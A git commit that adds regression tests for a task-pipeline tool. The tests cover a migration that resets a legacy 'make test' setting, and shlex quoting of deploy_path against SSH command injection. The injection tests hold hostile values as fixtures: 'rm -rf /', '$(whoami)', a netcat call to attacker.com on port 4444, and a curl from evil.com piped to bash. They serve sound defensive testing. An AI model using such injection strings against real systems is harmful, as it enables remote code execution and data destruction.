kin: auto-commit after pipeline

2026-03-17 20:16:10 +02:00 · 2026-03-17 20:16:10 +02:00 · c20eae01c1
commit c20eae01c1
parent 0e522e54a9
2 changed files with 493 additions and 0 deletions
--- a/tests/test_kin_102_regression.py
+++ b/tests/test_kin_102_regression.py
@ -0,0 +1,308 @@
+"""Regression tests for KIN-102:
+Legacy test_command='make test' blocks autocommit in projects without Makefile.
+
+Root cause: projects with legacy test_command='make test' (old schema default) fail the
+auto-test runner because the project has no Makefile. This triggers an auto-fix loop
+that eventually marks the pipeline as failed + task as blocked, causing an early return
+in run_pipeline BEFORE _run_autocommit is reached.
+
+Fix: migration in core/db.py resets test_command='make test' → NULL for all projects,
+allowing auto-detection to find the real test framework or skip tests gracefully.
+
+Coverage:
+(1) Migration: test_command='make test' → NULL (KIN-102 fix)
+(2) Migration: other test_command values are NOT reset
+(3) Bug scenario: legacy 'make test' → pipeline blocked, autocommit skipped
+(4) Post-fix: NULL test_command + no framework → pipeline succeeds + autocommit called
+"""
+
+import json
+import os
+import pytest
+from unittest.mock import patch, MagicMock
+
+
+# ---------------------------------------------------------------------------
+# Fixtures
+# ---------------------------------------------------------------------------
+
+@pytest.fixture
+def conn():
+    from core.db import init_db
+    from core import models
+    c = init_db(":memory:")
+    models.create_project(
+        c, "sharedbox", "SharedBox", "~/projects/sharedbox",
+        tech_stack=["typescript", "node"],
+    )
+    models.create_task(
+        c, "SHAREDBOX-003", "sharedbox", "Setup DB",
+        brief={"route_type": "backend_dev"},
+    )
+    yield c
+    c.close()
+
+
+def _mock_agent_success():
+    m = MagicMock()
+    m.returncode = 0
+    m.stdout = json.dumps({"status": "done", "changes": [], "notes": ""})
+    m.stderr = ""
+    return m
+
+
+def _mock_make_test_fail():
+    return {
+        "success": False,
+        "output": "make: No rule to make target `test'.  Stop.",
+        "returncode": 2,
+    }
+
+
+# ---------------------------------------------------------------------------
+# (1) Migration: test_command='make test' → NULL
+# ---------------------------------------------------------------------------
+
+class TestKin102Migration:
+    def test_legacy_make_test_reset_to_null(self):
+        """Migration resets test_command='make test' → NULL (KIN-102 fix)."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        c = init_db(":memory:")
+        models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
+                              tech_stack=["typescript"])
+        c.execute("UPDATE projects SET test_command='make test', auto_test_enabled=1 WHERE id='sbx'")
+        c.commit()
+
+        # Verify pre-condition: legacy value is set
+        row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
+        assert row[0] == "make test", "Pre-condition: test_command must be 'make test' before migration"
+
+        # Run migration
+        _migrate(c)
+
+        # After migration: test_command must be NULL
+        row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
+        assert row[0] is None, f"Expected NULL after migration, got {row[0]!r}"
+        c.close()
+
+    def test_npm_test_not_reset_by_migration(self):
+        """Migration must NOT reset test_command='npm test' (explicitly set by user)."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        c = init_db(":memory:")
+        models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
+                              tech_stack=["typescript"])
+        c.execute("UPDATE projects SET test_command='npm test' WHERE id='sbx'")
+        c.commit()
+
+        _migrate(c)
+
+        row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
+        assert row[0] == "npm test", "Migration must not change test_command='npm test'"
+        c.close()
+
+    def test_pytest_not_reset_by_migration(self):
+        """Migration must NOT reset test_command='pytest' (explicitly set by user)."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        c = init_db(":memory:")
+        models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
+                              tech_stack=["python"])
+        c.execute("UPDATE projects SET test_command='pytest' WHERE id='sbx'")
+        c.commit()
+
+        _migrate(c)
+
+        row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
+        assert row[0] == "pytest", "Migration must not change test_command='pytest'"
+        c.close()
+
+    def test_null_test_command_stays_null_after_migration(self):
+        """Migration must NOT affect projects that already have test_command=NULL."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        c = init_db(":memory:")
+        models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
+                              tech_stack=["typescript"])
+        # Default test_command is NULL — don't change it
+
+        _migrate(c)
+
+        row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
+        assert row[0] is None, "Migration must not touch NULL test_command"
+        c.close()
+
+    def test_migration_is_idempotent(self):
+        """Running migration twice must not cause errors or data corruption."""
+        from core.db import init_db, _migrate
+        from core import models
+
+        c = init_db(":memory:")
+        models.create_project(c, "sbx", "SharedBox", "~/projects/sharedbox",
+                              tech_stack=["typescript"])
+        c.execute("UPDATE projects SET test_command='make test' WHERE id='sbx'")
+        c.commit()
+
+        _migrate(c)
+        _migrate(c)  # second run must be safe
+
+        row = c.execute("SELECT test_command FROM projects WHERE id='sbx'").fetchone()
+        assert row[0] is None
+        c.close()
+
+
+# ---------------------------------------------------------------------------
+# (2) Bug scenario: legacy 'make test' → pipeline blocked, autocommit not called
+# ---------------------------------------------------------------------------
+
+class TestKin102BugScenario:
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_legacy_make_test_blocks_task(
+        self, mock_run, mock_tests, mock_autocommit, conn
+    ):
+        """Bug: legacy test_command='make test' on project without Makefile → task blocked."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(conn, "sharedbox",
+                              auto_test_enabled=True,
+                              test_command="make test")
+        mock_tests.return_value = _mock_make_test_fail()
+        mock_run.return_value = _mock_agent_success()
+
+        with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}):
+            result = run_pipeline(conn, "SHAREDBOX-003",
+                                  [{"role": "backend_dev", "brief": "setup db"}])
+
+        assert result["success"] is False
+        task = models.get_task(conn, "SHAREDBOX-003")
+        assert task["status"] == "blocked"
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_legacy_make_test_skips_autocommit(
+        self, mock_run, mock_tests, mock_autocommit, conn
+    ):
+        """Bug: when pipeline fails due to legacy 'make test', _run_autocommit is never called."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(conn, "sharedbox",
+                              auto_test_enabled=True,
+                              test_command="make test")
+        mock_tests.return_value = _mock_make_test_fail()
+        mock_run.return_value = _mock_agent_success()
+
+        with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}):
+            run_pipeline(conn, "SHAREDBOX-003",
+                         [{"role": "backend_dev", "brief": "setup db"}])
+
+        # Early return before _run_autocommit — never reached
+        mock_autocommit.assert_not_called()
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_blocked_reason_mentions_make_test(
+        self, mock_run, mock_tests, mock_autocommit, conn
+    ):
+        """Blocked reason must mention 'make test' for diagnosability."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(conn, "sharedbox",
+                              auto_test_enabled=True,
+                              test_command="make test")
+        mock_tests.return_value = _mock_make_test_fail()
+        mock_run.return_value = _mock_agent_success()
+
+        with patch.dict(os.environ, {"KIN_AUTO_TEST_MAX_ATTEMPTS": "0"}):
+            result = run_pipeline(conn, "SHAREDBOX-003",
+                                  [{"role": "backend_dev", "brief": "setup db"}])
+
+        assert "make test" in result.get("error", ""), (
+            f"Blocked reason must contain 'make test', got: {result.get('error')!r}"
+        )
+
+
+# ---------------------------------------------------------------------------
+# (3) Post-fix: NULL test_command + no framework → pipeline succeeds + autocommit called
+# ---------------------------------------------------------------------------
+
+class TestKin102PostFix:
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._detect_test_command")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_null_test_command_no_framework_pipeline_succeeds(
+        self, mock_run, mock_tests, mock_detect, mock_autocommit, conn
+    ):
+        """After fix: test_command=NULL, no framework detected → pipeline succeeds."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        # Simulate post-migration state: test_command reset to NULL
+        models.update_project(conn, "sharedbox",
+                              auto_test_enabled=True,
+                              test_command=None)
+        mock_run.return_value = _mock_agent_success()
+        mock_detect.return_value = None  # No test framework found (no Makefile/package.json)
+
+        result = run_pipeline(conn, "SHAREDBOX-003",
+                              [{"role": "backend_dev", "brief": "setup db"}])
+
+        assert result["success"] is True
+        mock_tests.assert_not_called()
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._detect_test_command")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_null_test_command_no_framework_autocommit_called(
+        self, mock_run, mock_tests, mock_detect, mock_autocommit, conn
+    ):
+        """After fix: test_command=NULL + no framework → _run_autocommit IS called."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(conn, "sharedbox",
+                              auto_test_enabled=True,
+                              test_command=None)
+        mock_run.return_value = _mock_agent_success()
+        mock_detect.return_value = None
+
+        run_pipeline(conn, "SHAREDBOX-003",
+                     [{"role": "backend_dev", "brief": "setup db"}])
+
+        # After fix: no early return → autocommit is reached
+        mock_autocommit.assert_called_once()
+
+    @patch("agents.runner._run_autocommit")
+    @patch("agents.runner._detect_test_command")
+    @patch("agents.runner._run_project_tests")
+    @patch("agents.runner.subprocess.run")
+    def test_null_test_command_triggers_autodetect(
+        self, mock_run, mock_tests, mock_detect, mock_autocommit, conn
+    ):
+        """After fix: test_command=NULL → _detect_test_command is called for auto-detection."""
+        from agents.runner import run_pipeline
+        from core import models
+
+        models.update_project(conn, "sharedbox",
+                              auto_test_enabled=True,
+                              test_command=None)
+        mock_run.return_value = _mock_agent_success()
+        mock_detect.return_value = None
+
+        run_pipeline(conn, "SHAREDBOX-003",
+                     [{"role": "backend_dev", "brief": "setup db"}])
+
+        mock_detect.assert_called_once()
--- a/tests/test_kin_infra_006_regression.py
+++ b/tests/test_kin_infra_006_regression.py
@ -0,0 +1,185 @@
+"""Regression tests for KIN-INFRA-006: command injection via deploy_path in SSH command.
+
+Root cause: _build_ssh_cmd() embedded deploy_path directly in f"cd {deploy_path} && {command}"
+without escaping, allowing shell metacharacters to be interpreted.
+
+Fix: shlex.quote(deploy_path) in core/deploy.py:_build_ssh_cmd(), line 54.
+
+Acceptance criteria:
+  1. deploy_path with shell metacharacters (';', '$(...)', '`...`', '|') is properly
+     escaped via shlex.quote — injected fragment does not leak into the command.
+  2. A legitimate path like '/srv/api' works normally (shlex.quote does not break it).
+  3. deploy_restart_cmd (admin-controlled command) is passed verbatim to SSH — NOT quoted
+     via shlex.quote (quoting a multi-word command would break remote execution).
+"""
+import shlex
+import pytest
+
+from core.deploy import _build_ssh_cmd, build_deploy_steps
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+def _ssh_project(deploy_path, **extra):
+    """Minimal project dict for _build_ssh_cmd."""
+    return {
+        "deploy_host": "10.0.0.1",
+        "deploy_path": deploy_path,
+        **extra,
+    }
+
+
+# ---------------------------------------------------------------------------
+# AC 1a — semicolon injection: '/srv/api; rm -rf /'
+# ---------------------------------------------------------------------------
+
+def test_semicolon_injection_in_deploy_path_is_escaped():
+    """AC1: deploy_path='/srv/api; rm -rf /' must be shell-quoted, not raw in command."""
+    malicious_path = "/srv/api; rm -rf /"
+    cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
+    full_cmd = cmd[-1]
+
+    # Must NOT appear as a bare shell fragment
+    assert "cd /srv/api; rm -rf /" not in full_cmd, (
+        "Semicolon injection must be neutralised — raw path must not appear in command"
+    )
+    # Must appear as a properly quoted string
+    assert shlex.quote(malicious_path) in full_cmd, (
+        "deploy_path must be wrapped by shlex.quote"
+    )
+
+
+# ---------------------------------------------------------------------------
+# AC 1b — command substitution: '$(whoami)'
+# ---------------------------------------------------------------------------
+
+def test_dollar_command_substitution_in_deploy_path_is_escaped():
+    """AC1: deploy_path containing '$(...) must be quoted — no shell expansion."""
+    malicious_path = "/srv/$(whoami)"
+    cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
+    full_cmd = cmd[-1]
+
+    assert "cd /srv/$(whoami) " not in full_cmd, (
+        "$(...) substitution must not be left unquoted"
+    )
+    assert shlex.quote(malicious_path) in full_cmd
+
+
+# ---------------------------------------------------------------------------
+# AC 1c — backtick command substitution: '`whoami`'
+# ---------------------------------------------------------------------------
+
+def test_backtick_injection_in_deploy_path_is_escaped():
+    """AC1: deploy_path containing backticks must be quoted."""
+    malicious_path = "/srv/`whoami`"
+    cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
+    full_cmd = cmd[-1]
+
+    assert "cd /srv/`whoami` " not in full_cmd
+    assert shlex.quote(malicious_path) in full_cmd
+
+
+# ---------------------------------------------------------------------------
+# AC 1d — pipe injection: '| nc attacker.com 4444'
+# ---------------------------------------------------------------------------
+
+def test_pipe_injection_in_deploy_path_is_escaped():
+    """AC1: deploy_path containing pipe must not open a second shell command."""
+    malicious_path = "/srv/app | nc attacker.com 4444"
+    cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
+    full_cmd = cmd[-1]
+
+    assert "cd /srv/app | nc attacker.com 4444" not in full_cmd
+    assert shlex.quote(malicious_path) in full_cmd
+
+
+# ---------------------------------------------------------------------------
+# AC 2 — legitimate path works normally
+# ---------------------------------------------------------------------------
+
+def test_legitimate_deploy_path_is_preserved():
+    """AC2: '/srv/api' (no special chars) must appear verbatim in the SSH command."""
+    cmd = _build_ssh_cmd(_ssh_project("/srv/api"), "git pull")
+    full_cmd = cmd[-1]
+
+    assert "/srv/api" in full_cmd, "Legitimate path must appear in command"
+    assert "git pull" in full_cmd, "The deploy command must appear after cd"
+    # Structure: cd '<path>' && git pull
+    assert "cd" in full_cmd
+    assert "&&" in full_cmd
+
+
+def test_legitimate_path_with_shlex_quote_is_unchanged():
+    """shlex.quote('/srv/api') must equal '/srv/api' — no redundant escaping."""
+    assert shlex.quote("/srv/api") == "/srv/api", (
+        "shlex.quote must not alter a simple path (no extra quoting)"
+    )
+
+
+def test_ssh_cmd_structure_is_list_not_string():
+    """_build_ssh_cmd must return a list — never shell=True with a string command."""
+    cmd = _build_ssh_cmd(_ssh_project("/srv/api"), "git pull")
+    assert isinstance(cmd, list), "SSH command must be a list (shell=False)"
+    assert cmd[0] == "ssh"
+
+
+# ---------------------------------------------------------------------------
+# AC 3 — deploy_restart_cmd reaches SSH verbatim (not shlex-quoted)
+# ---------------------------------------------------------------------------
+
+def test_deploy_restart_cmd_passes_verbatim_to_ssh():
+    """AC3: deploy_restart_cmd is a multi-word shell command — must NOT be shlex-quoted."""
+    restart_cmd = "docker compose restart worker"
+    project = {
+        "deploy_host": "myserver",
+        "deploy_path": "/srv/api",
+        "deploy_runtime": "docker",
+        "deploy_restart_cmd": restart_cmd,
+    }
+    cmd = _build_ssh_cmd(project, restart_cmd)
+    full_cmd = cmd[-1]
+
+    # Multi-word command must appear verbatim, not as a single-quoted token
+    assert restart_cmd in full_cmd, (
+        "deploy_restart_cmd must appear verbatim in the SSH command"
+    )
+    assert full_cmd != shlex.quote(restart_cmd), (
+        "deploy_restart_cmd must NOT be wrapped in shlex.quote — that would break remote execution"
+    )
+
+
+def test_build_deploy_steps_includes_restart_cmd():
+    """deploy_restart_cmd must be appended as a plain step in build_deploy_steps."""
+    restart_cmd = "systemctl restart myapp"
+    steps = build_deploy_steps({
+        "deploy_runtime": "python",
+        "deploy_restart_cmd": restart_cmd,
+    })
+    assert steps[-1] == restart_cmd, "restart_cmd must be last step, verbatim"
+
+
+# ---------------------------------------------------------------------------
+# Edge cases
+# ---------------------------------------------------------------------------
+
+def test_no_deploy_path_uses_command_directly():
+    """When deploy_path is None, the command is used as-is with no cd prefix."""
+    cmd = _build_ssh_cmd({"deploy_host": "myserver", "deploy_path": None}, "git pull")
+    full_cmd = cmd[-1]
+    assert "cd" not in full_cmd
+    assert full_cmd == "git pull"
+
+
+def test_ampersand_injection_in_deploy_path_is_escaped():
+    """deploy_path containing '&&' must not inject extra commands."""
+    malicious_path = "/srv/app && curl http://evil.com/shell.sh | bash"
+    cmd = _build_ssh_cmd(_ssh_project(malicious_path), "git pull")
+    full_cmd = cmd[-1]
+
+    # The injected part must not appear unquoted
+    assert "curl http://evil.com/shell.sh" not in full_cmd.replace(
+        shlex.quote(malicious_path), ""
+    )
+    assert shlex.quote(malicious_path) in full_cmd